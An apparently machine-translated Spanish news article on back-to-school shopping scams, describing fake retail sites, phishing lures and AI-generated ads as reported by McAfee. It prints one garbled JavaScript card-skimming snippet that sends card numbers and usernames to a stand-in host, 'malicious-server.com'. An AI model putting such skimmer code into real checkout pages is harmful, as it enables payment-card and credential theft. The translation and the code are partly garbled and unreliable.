A medida que las familias de todo el país se preparan para el regreso a la escuela, los cibercriminales están explotando la carrera estacional con una nueva ola de estafas de compras sofisticadas.
Aprovechando los picos en el gasto en línea, los estafadores están implementando campañas maliciosas que se aprovechan de los usuarios desprevenidos que buscan ofertas de suministros y ofertas exclusivas.
La aparición de estas estafas coincide con los crecientes informes de sitios web minoristas falsificados, notificaciones de entrega manipuladas y señuelos de phishing inteligentes, todos meticulosamente diseñados para cosechar credenciales personales y de pago.
La campaña de este año se distingue a través del despliegue de sitios falsos de manera convincente, que se difunden ampliamente a través de colocaciones de búsqueda patrocinadas, promociones de correo electrónico y, más notablemente, anuncios de medios sociales.
Estos anuncios falsos cuentan con acuerdos atractivos en todo, desde elementos esenciales del aula hasta productos electrónicos de grandes boletos, empleando imágenes impulsadas por IA para imitar a los minoristas acreditados.
La experiencia perfecta que ofrecen estos sitios desmiente su intención fraudulenta, y muchas víctimas solo se dan cuenta del engaño después de que se pierden los fondos o se comprometen los datos privados.
Analistas de McAfee identificado Esta amenaza coordinada aumenta a principios de agosto, luego de un marcado aumento en los informes de los usuarios y la telemetría de amenazas.
Su investigación reveló que estos estafadores emplean plataformas automatizadas para girar rápidamente grandes cantidades de portales de compras falsos.
Cada sitio está diseñado para evadir la detección básica, utilizando registros de dominio aleatorios y certificados SSL para reforzar la legitimidad aparente.
Estas tácticas técnicas, combinadas con una promoción agresiva en plataformas sociales, canalizan un alto volumen de tráfico web a través de la infraestructura maliciosa.
Un vector técnico particularmente insidioso descubierto por los investigadores de McAfee implica las cargas útiles de JavaScript de backend integradas en las páginas de pago.
Tras la presentación del formulario, estos scripts transmiten invisiblemente los números de tarjetas de crédito cosechados y las credenciales de inicio de sesión a los servidores controlados por los atacantes, a menudo encriptando transmisiones para eludir los filtros de red básicos.
La carga útil incrustada se asemeja al siguiente patrón ofuscado:-
(function () {var xhr = new xmlhttprequest (); xhr.open (‘post’, ‘https: //malicious-server.com/collect’,true); xhr.setRequestHeader (‘ content-type ‘,’ aplicación/json ‘); XHR.SEND (JSON.Stringify ({tarjeta: document.getElementById (‘cc_num’). Valor, usuario: document.getElementById (‘usr’). Value}));
Este enfoque no solo permite la exfiltración de credenciales inmediatas, sino que también proporciona a los atacantes un punto de apoyo persistente para un compromiso de cuenta adicional.
A medida que continúa la temporada de regreso a la escuela, los usuarios, especialmente los atraídos por minoristas desconocidos y anuncios promocionales urgentes, aumentan los objetivos principales para tales estafas avanzadas y en evolución.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.